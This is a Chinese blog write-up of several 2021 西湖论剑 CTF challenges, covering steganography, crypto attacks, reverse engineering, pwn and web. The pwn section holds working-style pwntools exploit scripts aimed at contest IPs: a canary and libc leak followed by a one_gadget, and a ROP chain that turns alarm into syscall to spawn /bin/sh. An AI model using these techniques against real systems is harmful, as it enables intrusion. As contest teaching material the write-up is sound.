• 2021 西湖论剑 部分wp


    2021 西湖论剑 部分wp

    太难了!!!大部分都解不出,无限期更吧。。。

    misc

    真·签到

    签到

    YUSA的小秘密

    师弟发现用ste打开能看到flag,但是不完整,噪点太多了,然后就是查资料,查到一篇,https://cloud.tencent.com/developer/article/1841652,
    里面提到的字节的一个ctf,看了wp,发现能转为YCrCb,拆分3通道,这样噪点会减少,就能看到flag

    from cv2 import *
    img = cv2.imread('Yusa.png')
    cv_color = cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)
    r,g,b = cv2.split(cv_color)
    cv2.imwrite('r.png', (r % 2) * 255)
    

    Yusa的秘密

    取证,待复现

    二向化的flag

    未解出

    Global Noise

    未解出

    crypto

    密码人集合

    算是签到题吧,nc连上后,很像是一个数独的游戏,我猜想是把汉字和数字一一对应,然后解出来,将9个九方格的数字换为汉字输入,得到flag

    西湖论剑我要拿第一 分别对应:1 2 3 4 5 6 7 8 9
    

    解出数字后,写个写脚本处理一下即可

    # coding:gbk
    a = {1:'西',2:'湖',3:'论',4:'剑',5:'我',6:'要',7:'拿',8:'第',9:'一'}
    b = '214568793358479621796321854321859476594763182678412539642185937935247816187963245'
    for i in b:
        print(a[int(i)],end='')
    

    unknown_dsa

    from Crypto.Util.number import *
    from Crypto.PublicKey import DSA
    from Crypto.Hash import SHA
    from gmpy2 import invert,powmod
    import random
    from secret import flag,m1,m2,ul,vl,wl
    
    def encrypt():
        key = DSA.generate(int(1024))
        q = key.q
        p = key.p
        g = key.g
        x1 = bytes_to_long(flag[:len(flag)//2])
        x2 = bytes_to_long(flag[len(flag)//2:])
        assert x1<q and x2<q
        t = powmod(g, p*q-(p+q), p*q)
        hm1 = bytes_to_long(SHA.new(m1).digest())
        hm2 = bytes_to_long(SHA.new(m2).digest())
        k = random.randint(1, q-1)
        r1 = powmod(g, k, p) % q
        s1 = (hm1 + x1*r1) * invert(k, q) % q
        s2 = (hm2 + x1*r1) * invert(k, q) % q
        r2 = powmod(g, x1, p) % q
        s3 = (hm1 + x2*r2) * invert(k, q) % q
        print(p*q, (p-1)//q, t, sep=', ')
        print(r1, s1, s2, sep=', ')
        print(r2, s3, sep=', ')
    
    def main():
        for i in range(len(ul)):
            assert ul[i]**2 - wl[i]* vl[i]**2==1
        e = 7
        cl1 = [int(powmod(bytes_to_long(m1), e, x)) for x in ul]
        cl2 = [int(powmod(bytes_to_long(m2), e, y)) for y in vl]
        print(wl, cl1, cl2, sep=', ')
        
        encrypt()
    
    if __name__ == '__main__':
        main()
    
    '''
    [3912956711, 4013184893, 3260747771], [2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704, 21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961, 301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424], [148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]
    85198615386075607567070020969981777827671873654631200472078241980737834438897900146248840279191139156416537108399682874370629888207334506237040017838313558911275073904148451540255705818477581182866269413018263079858680221647341680762989080418039972704759003343616652475438155806858735982352930771244880990190318526933267455248913782297991685041187565140859, 106239950213206316301683907545763916336055243955706210944736472425965200103461421781804731678430116333702099777855279469137219165293725500887590280355973107580745212368937514070059991848948031718253804694621821734957604838125210951711527151265000736896607029198, 60132176395922896902518845244051065417143507550519860211077965501783315971109433544482411208238485135554065241864956361676878220342500208011089383751225437417049893725546176799417188875972677293680033005399883113531193705353404892141811493415079755456185858889801456386910892239869732805273879281094613329645326287205736614546311143635580051444446576104548
    498841194617327650445431051685964174399227739376, 376599166921876118994132185660203151983500670896, 187705159843973102963593151204361139335048329243
    620827881415493136309071302986914844220776856282, 674735360250004315267988424435741132047607535029
    '''
    

    逆行思维,首先看到flag被拆为x1,x2,后面和x1,x2有关系的是hm1和hm2,hm1和hm2又和m1,m2有关系,最后m1,m2和cl1,cl12有关,并且已知,尝试能否求出

    看到 assert ul[i]**2 - wl[i]* vl[i]**2==1,联想可以用佩尔方程来解得到ul,vl,解出来后广播攻击可以得到m1,m2,然后可以得到hm1和hm2,p和q也可以通过已知条件求出,到此,所有的条件都已知,即可得到flag

    def pell(n,numTry = 1000):
    	cf = continued_fraction(sqrt(n))
    	for i in range (numTry):
    		vl = cf.denominator (i)
    		ul = cf.numerator (i)
    		if ul**2 - n * vl**2 == 1:
    			#sols.append((ZZ(ul) , ZZ(vl)))
    			return ul,vl
    	sols = zip(ul,vl)
    	return sols
    	
    			
    wl, cl1, cl2 = [3912956711, 4013184893, 3260747771], [2852589223779928796266540600421678790889067284911682578924216186052590393595645322161563386615512475256726384365091711034449682791268994623758937752874750918200961888997082477100811025721898720783666868623498246219677221106227660895519058631965055790709130207760704, 21115849906180139656310664607458425637670520081983248258984166026222898753505008904136688820075720411004158264138659762101873588583686473388951744733936769732617279649797085152057880233721961, 301899179092185964785847705166950181255677272294377823045011205035318463496682788289651177635341894308537787449148199583490117059526971759804426977947952721266880757177055335088777693134693713345640206540670123872210178680306100865355059146219281124303460105424], [148052450029409767056623510365366602228778431569288407577131980435074529632715014971133452626021226944632282479312378667353792117133452069972334169386837227285924011187035671874758901028719505163887789382835770664218045743465222788859258272826217869877607314144, 1643631850318055151946938381389671039738824953272816402371095118047179758846703070931850238668262625444826564833452294807110544441537830199752050040697440948146092723713661125309994275256, 10949587016016795940445976198460149258144635366996455598605244743540728764635947061037779912661207322820180541114179612916018317600403816027703391110922112311910900034442340387304006761589708943814396303183085858356961537279163175384848010568152485779372842]
    
    ul = []
    vl = []
    for i in range(len(wl)):
    	a = pell(wl[i])
    	ul.append(a[0])
    	vl.append(a[1])
    print(ul)
    print(vl)
    
    c1=crt(cl1,ul)
    c2=crt(cl2,vl)
    
    PR.<x>=PolynomialRing(ZZ)
    f=x^7-c1
    m1=int(f.roots()[0][0])
    f=x^7-c2
    m2=int(f.roots()[0][0])
    print(m1)
    print(m2)
    

    得到flag的代码如下

    from gmpy2 import *
    from Crypto.Util.number import *
    from Crypto.Hash import SHA
    
    pq,p_1_q = 85198615386075607567070020969981777827671873654631200472078241980737834438897900146248840279191139156416537108399682874370629888207334506237040017838313558911275073904148451540255705818477581182866269413018263079858680221647341680762989080418039972704759003343616652475438155806858735982352930771244880990190318526933267455248913782297991685041187565140859, 106239950213206316301683907545763916336055243955706210944736472425965200103461421781804731678430116333702099777855279469137219165293725500887590280355973107580745212368937514070059991848948031718253804694621821734957604838125210951711527151265000736896607029198
    p = iroot(pq*p_1_q+1//4,2)[0]+1//2
    q = pq//p
    
    m1 = 8382905590662478666595114136929713707132131361720892331048437274828529226704174
    m2 = 10336852405630488944198347577475266693234960398137850045398990629116544863921454
    
    hm1 = bytes_to_long(SHA.new(long_to_bytes(m1)).digest())
    hm2 = bytes_to_long(SHA.new(long_to_bytes(m2)).digest())
    
    r1,s1,s2,r2,s3 = 498841194617327650445431051685964174399227739376,376599166921876118994132185660203151983500670896, 187705159843973102963593151204361139335048329243,620827881415493136309071302986914844220776856282,674735360250004315267988424435741132047607535029
    k=(hm2-hm1)*inverse(s2-s1,q)%q
    x1=(s2*k-hm2)*inverse(r1,q)%q
    x2=(s3*k-hm1)*inverse(r2,q)%q
     
    print(long_to_bytes(x1)+long_to_bytes(x2))
    

    hardrsa

    from Crypto.Util.number import *
    import gmpy2
    from secret import flag
    
    p = getPrime(512)
    q = getPrime(512)
    n = p**4*q
    
    e = 65537
    phi = gmpy2.lcm(p - 1, q - 1)
    d = gmpy2.invert(e, phi)
    dp = d % (p - 1)
    m = bytes_to_long(flag)
    c = pow(m, e, n)
    print ("dp = " + str(dp))
    print ("c = " + str(c))
    
    y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
    
    g = 2
    x = 2019*p**2 + 2020*p**3 + 2021*p**4
    c1 = pow(g, x, y)
    print( "c1 = " + str(c1))
    
    
    # dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473
    
    # c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
    
    # c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059
    

    离散对数加上解方程是可以求出p,但是n并不知道,最开始想直接求q,但是求不出来,我们用已知条件尝试推导一下是否能求出明文

    已知
    dp = d mod (p - 1)
    c = m^e mod n
    
    引进参数dp,则有
    c^dp = m^(e*dp) mod n
    化简
    c^dp = m^(e*dp) mod p
    因为dp = d mod (p - 1)
    可再化简为
    c^dp = m^(e*d) mod p ******************1式子
    因为题中出现了
    phi = gmpy2.lcm(p - 1, q - 1)
    d = gmpy2.invert(e, phi)
    所以存在关系
    e*d = 1 mod lcm(p - 1, q - 1)
    即存在
    e*d = 1 mod p - 1,e*d = k(p-1)+1,代入1式子
    c^dp =  m^(k(p-1)+1) mod p
    c^dp = m+m^k(p-1) mod p ****************2式子
    费马小定理化简一下,2式子变为
    c^dp = m mod p
    
    综上:仅知道dp和p,是可以求出m的
    

    那么就是先求出前半部分即可,需要一段时间,我跑了12分钟(电脑废)

    import sympy
    from Crypto.Util.number import *
    
    g = 2
    y = 449703347709287328982446812318870158230369688625894307953604074502413258045265502496365998383562119915565080518077360839705004058211784369656486678307007348691991136610142919372779782779111507129101110674559235388392082113417306002050124215904803026894400155194275424834577942500150410440057660679460918645357376095613079720172148302097893734034788458122333816759162605888879531594217661921547293164281934920669935417080156833072528358511807757748554348615957977663784762124746554638152693469580761002437793837094101338408017407251986116589240523625340964025531357446706263871843489143068620501020284421781243879675292060268876353250854369189182926055204229002568224846436918153245720514450234433170717311083868591477186061896282790880850797471658321324127334704438430354844770131980049668516350774939625369909869906362174015628078258039638111064842324979997867746404806457329528690722757322373158670827203350590809390932986616805533168714686834174965211242863201076482127152571774960580915318022303418111346406295217571564155573765371519749325922145875128395909112254242027512400564855444101325427710643212690768272048881411988830011985059218048684311349415764441760364762942692722834850287985399559042457470942580456516395188637916303814055777357738894264037988945951468416861647204658893837753361851667573185920779272635885127149348845064478121843462789367112698673780005436144393573832498203659056909233757206537514290993810628872250841862059672570704733990716282248839
    c1 = 78100131461872285613426244322737502147219485108799130975202429638042859488136933783498210914335741940761656137516033926418975363734194661031678516857040723532055448695928820624094400481464950181126638456234669814982411270985650209245687765595483738876975572521276963149542659187680075917322308512163904423297381635532771690434016589132876171283596320435623376283425228536157726781524870348614983116408815088257609788517986810622505961538812889953185684256469540369809863103948326444090715161351198229163190130903661874631020304481842715086104243998808382859633753938512915886223513449238733721777977175430329717970940440862059204518224126792822912141479260791232312544748301412636222498841676742208390622353022668320809201312724936862167350709823581870722831329406359010293121019764160016316259432749291142448874259446854582307626758650151607770478334719317941727680935243820313144829826081955539778570565232935463201135110049861204432285060029237229518297291679114165265808862862827211193711159152992427133176177796045981572758903474465179346029811563765283254777813433339892058322013228964103304946743888213068397672540863260883314665492088793554775674610994639537263588276076992907735153702002001005383321442974097626786699895993544581572457476437853778794888945238622869401634353220344790419326516836146140706852577748364903349138246106379954647002557091131475669295997196484548199507335421499556985949139162639560622973283109342746186994609598854386966520638338999059
    
    #p_f = sympy.discrete_log(y,c1,g)
    #print(p_f)
    
    p_f = 43776275628859890575232443794319298551934804213472744927022818696759188901977390266973172755658396197421139420206549889337117978597883154859965236605452518446448639813055134133587564045471804447818058571586426895800984805588363855865218690877547419152765512143095217413477343835473963637692441032136163289964756172316289469159500312630529091350636808491697553069388388303341623047737553556123142002737059936569931163197364571478509576816349348146215101250803826590694039096063858424405382950769415272111843039715632655831594224288099608827345377164375927559338153505991404973888594356664393487249819589915881178770048740
    c = 57248258945927387673579467348106118747034381190703777861409527336272914559699490353325906672956273559867941402281438670652710909532261303394045079629146156340801932254839021574139943933451924062888426726353230757284582863993227592703323133265180414382062132580526658205716218046366247653881764658891315592607194355733209493239611216193118424602510964102026998674323685134796018596817393268106583737153516632969041693280725297929277751136040546830230533898514659714717213371619853137272515967067008805521051613107141555788516894223654851277785393355178114230929014037436770678131148140398384394716456450269539065009396311996040422853740049508500540281488171285233445744799680022307180452210793913614131646875949698079917313572873073033804639877699884489290120302696697425
    dp = 379476973158146550831004952747643994439940435656483772269013081580532539640189020020958796514224150837680366977747272291881285391919167077726836326564473
    
    p = sympy.symbols("p")
    p = sympy.solve([2019*p**2 + 2020*p**3 + 2021*p**4-p_f], [p])
    
    m = pow(c,dp,int(p[0][0]))
    print(long_to_bytes(m))
    

    FilterRandom

    未解出

    SpecialCurve2

    未解出

    WienerStudyTwice

    0解

    reverse

    ROP

    32位程序,无壳,ida分析,逻辑非常简单,我截取主要部分

     memset(&Dst, 0, 0x100u);
      memset(Buf2, 0, 0x100u);
      sub_401650("Input:");
      sub_4016A0("%40s", &Dst);
      if ( strlen(&Dst) != 40 )
        exit(0);
      for ( i = 0; i < 0x28; i += 8 )
      {
        for ( j = 0; j < 8; ++j )
        {
          v0 = ((*(&v2 + j) & *(&v16 + i)) << (8 - (3 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v16 + i)) >> (3 - j) % 8u) | ((*(&v2 + j) & *(&v15 + i)) << (8 - (2 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v15 + i)) >> (2 - j) % 8u) | ((*(&v2 + j) & *(&v14 + i)) << (8 - (1 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v14 + i)) >> (1 - j) % 8u) | ((*(_BYTE *)(&v2 + j) & (unsigned __int8)*(&Dst + i)) << (8 - -j % 8u)) | ((*(&v2 + j) & (unsigned int)*(&Dst + i)) >> -j % 8u);
          Buf2[j + i] = byte_405000[(unsigned __int8)(((*(_BYTE *)(&v2 + j) & (unsigned __int8)v20[i]) << (8 - (7 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)v20[i]) >> (7 - j) % 8u) | ((*(&v2 + j) & *(&v19 + i)) << (8 - (6 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v19 + i)) >> (6 - j) % 8u) | ((*(&v2 + j) & *(&v18 + i)) << (8 - (5 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v18 + i)) >> (5 - j) % 8u) | ((*(&v2 + j) & *(&v17 + i)) << (8 - (4 - j) % 8u)) | ((*(&v2 + j) & (unsigned int)*(&v17 + i)) >> (4 - j) % 8u) | v0)];
        }
      }
      if ( memcmp(&unk_405100, Buf2, 0x28u) )
      {
        puts("Wrong");
        exit(0);
      }
      puts("Congratulations");
      puts("flag is DASCTF{your input}");
    

    从中看出就是算法比较麻烦,但是最后的结果我们是已知的,稍微整理一下

    v0 = 
    	  ((*(&v2 + j) & *(flag+3 + i)) << (8 - (3 - j) % 8u)) | 
    	  ((*(&v2 + j) & *(flag+3 + i)) >> (3 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+2 + i)) << (8 - (2 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+2 + i)) >> (2 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+1 + i)) << (8 - (1 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+1 + i)) >> (1 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag + i)) << (8 - -j % 8u)) |
    	  ((*(&v2 + j) & *(flag + i)) >> -j % 8u);
            
    Buf2[j + i] = byte_405000[
    	  ((*(&v2 + j) & *(flag+7 + i) << (8 - (7 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+7 + i) >> (7 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+6 + i)) << (8 - (6 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+6 + i)) >> (6 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+5 + i)) << (8 - (5 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+5 + i)) >> (5 - j) % 8u) |
    	  ((*(&v2 + j) & *(flag+4 + i)) << (8 - (4 - j) % 8u)) |
    	  ((*(&v2 + j) & *(flag+4 + i)) >> (4 - j) % 8u) |
    	  v0)];        
    

    z3解一下

    from z3 import *
    Buf2 = [0x65, 0x55, 0x24, 0x36, 0x9D, 0x71, 0xB8, 0xC8, 0x65, 0xFB, 0x87, 0x7F, 0x9A, 0x9C, 0xB1, 0xDF, 0x65, 0x8F, 0x9D, 0x39, 0x8F, 0x11, 0xF6, 0x8E, 0x65, 0x42, 0xDA, 0xB4, 0x8C, 0x39, 0xFB, 0x99, 0x65, 0x48, 0x6A, 0xCA, 0x63, 0xE7, 0xA4, 0x79]
    byte_405000 = [0x65, 0x08, 0xF7, 0x12, 0xBC, 0xC3, 0xCF, 0xB8, 0x83, 0x7B, 0x02, 0xD5, 0x34, 0xBD, 0x9F, 0x33, 0x77, 0x76, 0xD4, 0xD7, 0xEB, 0x90, 0x89, 0x5E, 0x54, 0x01, 0x7D, 0xF4, 0x11, 0xFF, 0x99, 0x49, 0xAD, 0x57, 0x46, 0x67, 0x2A, 0x9D, 0x7F, 0xD2, 0xE1, 0x21, 0x8B, 0x1D, 0x5A, 0x91, 0x38, 0x94, 0xF9, 0x0C, 0x00, 0xCA, 0xE8, 0xCB, 0x5F, 0x19, 0xF6, 0xF0, 0x3C, 0xDE, 0xDA, 0xEA, 0x9C, 0x14, 0x75, 0xA4, 0x0D, 0x25, 0x58, 0xFC, 0x44, 0x86, 0x05, 0x6B, 0x43, 0x9A, 0x6D, 0xD1, 0x63, 0x98, 0x68, 0x2D, 0x52, 0x3D, 0xDD, 0x88, 0xD6, 0xD0, 0xA2, 0xED, 0xA5, 0x3B, 0x45, 0x3E, 0xF2, 0x22, 0x06, 0xF3, 0x1A, 0xA8, 0x09, 0xDC, 0x7C, 0x4B, 0x5C, 0x1E, 0xA1, 0xB0, 0x71, 0x04, 0xE2, 0x9B, 0xB7, 0x10, 0x4E, 0x16, 0x23, 0x82, 0x56, 0xD8, 0x61, 0xB4, 0x24, 0x7E, 0x87, 0xF8, 0x0A, 0x13, 0xE3, 0xE4, 0xE6, 0x1C, 0x35, 0x2C, 0xB1, 0xEC, 0x93, 0x66, 0x03, 0xA9, 0x95, 0xBB, 0xD3, 0x51, 0x39, 0xE7, 0xC9, 0xCE, 0x29, 0x72, 0x47, 0x6C, 0x70, 0x15, 0xDF, 0xD9, 0x17, 0x74, 0x3F, 0x62, 0xCD, 0x41, 0x07, 0x73, 0x53, 0x85, 0x31, 0x8A, 0x30, 0xAA, 0xAC, 0x2E, 0xA3, 0x50, 0x7A, 0xB5, 0x8E, 0x69, 0x1F, 0x6A, 0x97, 0x55, 0x3A, 0xB2, 0x59, 0xAB, 0xE0, 0x28, 0xC0, 0xB3, 0xBE, 0xCC, 0xC6, 0x2B, 0x5B, 0x92, 0xEE, 0x60, 0x20, 0x84, 0x4D, 0x0F, 0x26, 0x4A, 0x48, 0x0B, 0x36, 0x80, 0x5D, 0x6F, 0x4C, 0xB9, 0x81, 0x96, 0x32, 0xFD, 0x40, 0x8D, 0x27, 0xC1, 0x78, 0x4F, 0x79, 0xC8, 0x0E, 0x8C, 0xE5, 0x9E, 0xAE, 0xBF, 0xEF, 0x42, 0xC5, 0xAF, 0xA0, 0xC2, 0xFA, 0xC7, 0xB6, 0xDB, 0x18, 0xC4, 0xA6, 0xFE, 0xE9, 0xF5, 0x6E, 0x64, 0x2F, 0xF1, 0x1B, 0xFB, 0xBA, 0xA7, 0x37, 0x8F]
    key = [128,64,32,16,8,4,2,1]
    
    flag = [BitVec(f"flag[{i}]", 8) for i in range(40)]
    
    s = Solver()
    for i in range(0,0x28,8):
    	for j in range(8):
    		v0 = ((key[j] & flag[i + 3]) << (8 - (3 - j) % 8)) | ((key[j] & flag[i + 3]) >> ((3 - j) % 8)) | ((key[j] & flag[i + 2]) << (8 - (2 - j) % 8)) | ((key[j] & flag[i + 2]) >> ((2 - j) % 8)) | ((key[j] & flag[i + 1]) << (8 - (1 - j) % 8)) | ((key[j] & flag[i + 1]) >> ((1 - j) % 8)) | ((key[j] & flag[i]) << (8 - -j % 8)) | ((key[j] & flag[i]) >> (-j % 8))
    		Buf2_ = ((key[j] & flag[i + 7]) << (8 - (7 - j) % 8)) | ((key[j] & flag[i + 7]) >> ((7 - j) % 8)) | ((key[j] & flag[i + 6]) << (8 - (6 - j) % 8)) | ((key[j] & flag[i + 6]) >> ((6 - j) % 8)) | ((key[j] & flag[i + 5]) << (8 - (5 - j) % 8)) | ((key[j] & flag[i + 5]) >> ((5 - j) % 8)) | ((key[j] & flag[i + 4]) << (8 - (4 - j) % 8)) | ((key[j] & flag[i + 4]) >> ((4 - j) % 8))
    		
    		s.add(v0 | Buf2_ == byte_405000.index(Buf2[i+j]))
    assert s.check() == sat
    m = s.model()
    
    finflag = []
    for i in flag:
    	finflag.append(chr(m[i].as_long()))
    print(''.join(finflag))	
    

    gghdl

    未解出

    TacticalArmed

    ida分析没发现什么,后面突然看到存在一个tls回调函数

    跟进StartAddress函数

    发现int 2dh,这个是个反调试,在调试的时候不会去抛出异常,正常执行的时候抛出异常,也就是说需要抛出异常才是正常情况,可能那里藏了什么,跟踪一下

    看到数组赋值了四个值,我将int 2dh改为int 3,动态调试发现很奇怪的地方

    跟进后发现每次循环,里面的指令都不一样,这里应该是一个动态解码的过程,多条指令分析这个算法应该为tea算法,确定delta为0x81A5692e

    写解密算法脚本

    #include <stdint.h>
    #include <stdio.h>
    
    void decrypt(uint32_t* v, uint32_t* k,int z) {
    
      uint32_t v0 = v[0], v1 = v[1], sum = 0x81A5692e*33*(z+1), i;         
      uint32_t k0 = k[0], k1 = k[1], k2 = k[2], k3 = k[3]; 
    
      for (i = 0; i < 33; i++) {  
        v1 -= ((v0 << 4) + k2) ^ (v0 + sum) ^ ((v0 >> 5) + k3);
        v0 -= ((v1 << 4) + k0) ^ (v1 + sum) ^ ((v1 >> 5) + k1);
        sum -= 0x81A5692e;
      } 
      v[0] = v0;
      v[1] = v1;
    }
    
    int main()
    {
    	uint32_t key[] = {0x7CE45630, 0x58334908, 0x66398867, 0x0C35195B1};
    	int8_t ida_chars[40] ={0xED, 0x1D, 0x2F, 0x42, 0x72, 0xE4, 0x85, 0x14, 0xD5, 0x78, 0x55, 0x03, 0xA2, 0x80, 0x6B, 0xBF, 0x45, 0x72, 0xD7, 0x97, 0xD1, 0x75, 0xAE, 0x2D, 0x63, 0xA9, 0x5F, 0x66, 0x74, 0x6D, 0x2E, 0x29, 0xC1, 0xFC, 0x95, 0x97, 0xE9, 0xC8, 0xB5, 0x0B};
    
    	int i,j;
    	for (i = 0,j=0; i < 40,j < 5; i += 8,j++) 
    	{
    		decrypt((uint32_t*)(ida_chars + i), key , j);
    	}
    
      printf("%s\n",ida_chars);
    }
    
    

    虚假的粉丝

    我还以为是misc,ida分析

    内容比较简单,先找到密钥,密钥是藏在文件里面,需要找到符合条件的那个文件

    root@kali:~/LibcSearcher# grep -E "U.{38}S" *.txt
    ASCII-faded 4157.txt:aaZ8088aaZ88B008BBBBB8888Z088Z8ZZZaX8@WBWW@W@W@W@W@WWWWBWBBB@@UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNSWMa  ............,.,.,.,,,,:
    

    然后取前40位

    UzNDcmU3X0szeSUyMCUzRCUyMEFsNE5fd0FsSzNS
    

    base64和url解码后得到

    S3Cre7_K3y = Al4N_wAlK3R
    

    然后将运行程序,输入文件名,偏移,字符串长度,密钥,得到解密后的5315.txt,得到flag

    pwn

    string_go

        Arch:     amd64-64-little
        RELRO:    Full RELRO
        Stack:    Canary found
        NX:       NX enabled
        PIE:      PIE enabled
    

    64位程序,保护全开(c++伪代码看起来很费劲)

    这里没有检查输入的值的大小,输入为-1即可溢出

    但是保护全开,得先泄露一下cannry

    from pwn import *
    
    context(os = "linux", arch = "amd64",log_level= "debug")
    context.terminal = ['tmux', 'splitw', '-h']
    
    #r = process(['/root/LibcSearcher/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/ld-2.27.so','./string_go_libc-2.27.so'],env={'LD_PRELOAD':'/root/LibcSearcher/glibc-all-in-one/libs/2.27-3ubuntu1.4_amd64/libc-2.27.so'})
    r = remote('82.157.20.104',xxxx)
    
    r.recvuntil('>>> ')
    r.sendline('1+2')
    r.recvuntil('>>> ')
    r.sendline('-1')
    r.recvuntil('>>> ')
    r.sendline('hhh')
    r.recvuntil('>>> ')
    r.sendline('1')
    
    r.recv(0x28)
    libc_base = =u64(r.recv(8))-0x730157
    r.recv(8)
    canary=u64(r.recv(8))
    one_gadget = libc_base+0x4f3d5
    payload = 'a'*0x18+p64(canary)+'a'*0x18+p64(one_gadget)
    
    r.sendline(payload)
    
    #gdb.attach(r)
    r.interactive()
    

    blind

        Arch:     amd64-64-little
        RELRO:    Partial RELRO
        Stack:    No canary found
        NX:       NX enabled
        PIE:      No PIE (0x400000)
    

    只开启nx保护,程序很简单

    ssize_t __fastcall main(__int64 a1, char **a2, char **a3)
    {
      char buf; // [rsp+0h] [rbp-50h]
    
      setvbuf(stdin, 0LL, 2, 0LL);
      setvbuf(stdout, 0LL, 2, 0LL);
      setvbuf(stderr, 0LL, 2, 0LL);
      alarm(8u);
      sleep(3u);
      return read(0, &buf, 0x500uLL);
    }
    

    没有后门函数,也没有相关的输出函数,但是存在alerm函数,这个是个突破口,看一下寄存器,可以构造特定的payload,因为alarm和syscall地址就差了5,可以修改一个字节,让alarm地址变为syscall,然后传入rax

    除了但是不同版本的libc,alarm最低位是不一样的,除非爆破,提示是说不用爆破。。可能存在更简单的解法吧

    from pwn import *
    
    context(os = "linux", arch = "amd64",log_level= "debug")
    context.terminal = ['tmux', 'splitw', '-h']
    
    #r = process('./blind')
    r = remote('"82.157.6.165"',xxx)
    elf = ELF('./blind')
    read_got = elf.got['read']
    alarm_got = elf.got['alarm']
    pop = 0x4007BA
    mov = 0x4007A0
    bss = 0x601088
    
    def makepayload(rbx, rbp, r12, r13, r14, r15):
        payload = p64(pop)+p64(rbx)+p64(rbp)
        payload += p64(r12)
        payload += p64(r13)+p64(r14)+p64(r15)
        payload += p64(mov)
        payload += 'a'*0x38
        return payload
    
    payload = 'a'*(0x50+8)
    payload += makepayload(0,1,r12=read_got,r13=1,r14=alarm_got,r15=0)
    payload += makepayload(0,1,r12=read_got,r13=59,r14=bss,r15=0)
    payload += makepayload(0,1,r12=alarm_got,r13=0,r14=0,r15=bss)
    
    payload += '\x00'*(0x500-len(payload))
    r.send(payload)
    #r.send('\x15')
    r.send('\xd5')
    r.send('/bin/sh\x00'+'a'*(59-8))
    #gdb.attach(r)
    r.interactive()
    

    code_project

    未解开

    easykernel

    内核题,未解开

    SimpleDecoder

    未解开

    TinyNote

    未解开

    web

    灏妹的web

    扫描目录得到: /.idea/dataSources.xml

    访问得到flag

    其他

    非web选手,见其他师傅wp

    作者:寒江寻影
    本文版权归作者和博客园共有,欢迎转载,但未经作者同意必须在文章页面给出原文链接,否则保留追究法律责任的权利。
  • 相关阅读:
